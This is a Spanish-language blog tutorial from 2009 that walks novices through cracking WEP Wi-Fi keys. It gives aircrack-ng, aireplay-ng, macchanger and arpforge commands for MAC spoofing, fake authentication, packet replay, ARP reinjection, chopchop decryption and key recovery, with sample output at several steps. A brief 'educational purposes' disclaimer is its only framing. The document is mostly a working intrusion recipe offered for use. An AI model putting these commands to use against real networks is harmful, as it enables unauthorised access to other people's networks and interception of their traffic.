30 de agosto de 2009

Crackear Wep para novatos.

Un simple tutorial que explica paso por paso, ataque por ataque cómo crackear una clave WEP.

--------------------------------------------------------------------------------

Pasos:

1- Parar la tarjeta para poder fijarla en modo monitor. (En el caso de que tu tarjeta se llame eth1, tienes que saber cómo se llama tu tarjeta)
  • airmon-ng stop eth1
2- Parar la tarjeta para poder fijarla en modo monitor (2).
  • ifconfig eth1 down
3- Cambiar la ruta mac.
  • macchanger --mac 00:11:22:33:44:55 eth1
4- Iniciar tarjeta en modo monitor.
  • airmon-ng start eth1
5- Iniciar airodump para ver las redes inalámbricas disponibles.
  • airodump-ng eth1
6- Iniciar airodump con la red especificada.
  • airodump-ng -c (canal) -w (nombre de archivo) --bssid (bssid) eth1

---------------------------------------------------------------------------------------------------------------------------------------------------------

Existe un simple test de inyección para saber que ataque funciona. Si quieren ahorrar tiempo, utilízenlo.
Yo nunca utilizo este test, he visto que falla. Hacen falta dos tarjetas para poder llevarlo a cabo. Una que inyecte y otra que recibe.

Se usa así:
  • aireplay-ng -9 -e (Nombre de la red) -a (Mac del punto de acceso) -i eth2 eth1
-----------------------------------------------------------------------------------------------------------------------------------------------------------
TIPOS DE ATAQUES

1- Falsa autentificación.

Recomiendo usar una dirección mac falsa cuando no hay clientes conectados (00:11:22:33:44:55).
Si hay clientes conectados se puede usar la dirección mac del cliente.
  • aireplay-ng -1 0 -e (nombre de la red) -a (El bssid) -h (Nuestra tarjeta mac o la del cliente conectado) eth1
12:14:06 Sending Authentication Request
12:14:06 Authentication successful
12:14:06 Sending Association Request
12:14:07 Association successful :-)

Algunos routers piden reauntificiación cada 30 segundos. Para ello, escribimos:
  • aireplay-ng -1 30 -e (nombre de la red) -a (El bssid) -h (La mac) eth1

---------------------------------------------------------------------------------------------------------------------------------------------------------

2- Reenvio interactivo de paquetes.

Este ataque te permite elegir un paquete dado para reenviarlo.
A veces proporciona resultados más efectivos que la reinyección automática de ARP (ataque 3).
  • aireplay-ng -2 -b (El bssid) -n 100 -p 0841 -h (Nuestra Mac o la del cliente) -c FF:FF:FF:FF:FF:FF eth1

---------------------------------------------------------------------------------------------------------------------------------------------------------

3- Reinyección automática de ARP

Este ataque es el mas efectivo para generar nuevos IVs, y funciona de forma muy eficaz. A lo mejor habrá que esperar unos minutos para que aparezca una petición ARP.
Tengan en cuenta que este ataque fallará si no hay clientes ascociados.
  • aireplay-ng -3 -b (El bssid) -h (Nuestra Mac o la del cliente) eth1
Saving ARP requests in replay_arp-0627-121526.cap
You must also start airodump to capture replies.
Read 2493 packets (got 1 ARP requests), sent 1305 packets...

---------------------------------------------------------------------------------------------------------------------------------------------------------

-4 Chopchop (predicción de CRC)

Este ataque, cuando es exitoso, puede desencriptar un paquete de datos WEP sin conocer la clave.

1. Primero, desencriptemos un paquete:
  • aireplay -4 -h (Nuestra Mac o la del cliente) eth1
2. Echemos un vistazo a la dirección IP:
  • tcpdump -s 0 -n -e -r replay_dec-0627-022301.cap
reading from file replay_dec-0627-022301.cap, link-type [...]
IP 192.168.1.2 > 192.168.1.255: icmp 64: echo request seq 1

3. Ahora, forjemos una petición ARP.

La IP inicial no importa (192.168.1.100), pero la Ip de destino (192.168.1.2) debe responder a peticiones ARP. La dirección MAC inicial debe corresponder a una estación asociada.
  • ./arpforge replay_dec-0627-022301.xor 1 (El bssid) (La Mac del cliente) 192.168.1.100 192.168.1.2 arp.cap
4. Y reenviemos nuestra petición ARP forjada:
  • aireplay-ng -2 -r arp.cap eth1
-----------------------------------------------------------------------------------------------------------------------------------------------------------

-5 Obtener la clave con aircrack

Primero hay que copiar el nombre del archivo de captura. Las capturas se guarden en "HOME".
El número de paquetes necesarios para obtener la clave WEP es muy variado. Yo recomiendo unos 250.000. Ve probando a medida que vayas obteniendo paquetes.

Si tienes Backtrack 2 o inferior, tendrás que hacer la desencriptación de éste modo:
  • Aircrack-ng (Nombre del archivo).cap
Si tienes Bactrack 3 o superior, dispones de un ataque llamado "PTW". Es más rápido y eficaz.
  • Aircrack-ng -z (Nombre del archivo).cap
-------------------------------------------------------------------------------------

*Disclaimer: Educational purposes meant with this tutorial
*Tutorial by: Monzi_sez
30 octubre 2009

1 comentario:

  1. Bien bien, por fin terminaste con tu tuto, XD.
    Aunque veo fallitos, ;).[shhhhh!!!! me callo, me callo...,XD] Pero en general está ¡muy bien!
    Satisfecho, :D

    ResponderEliminar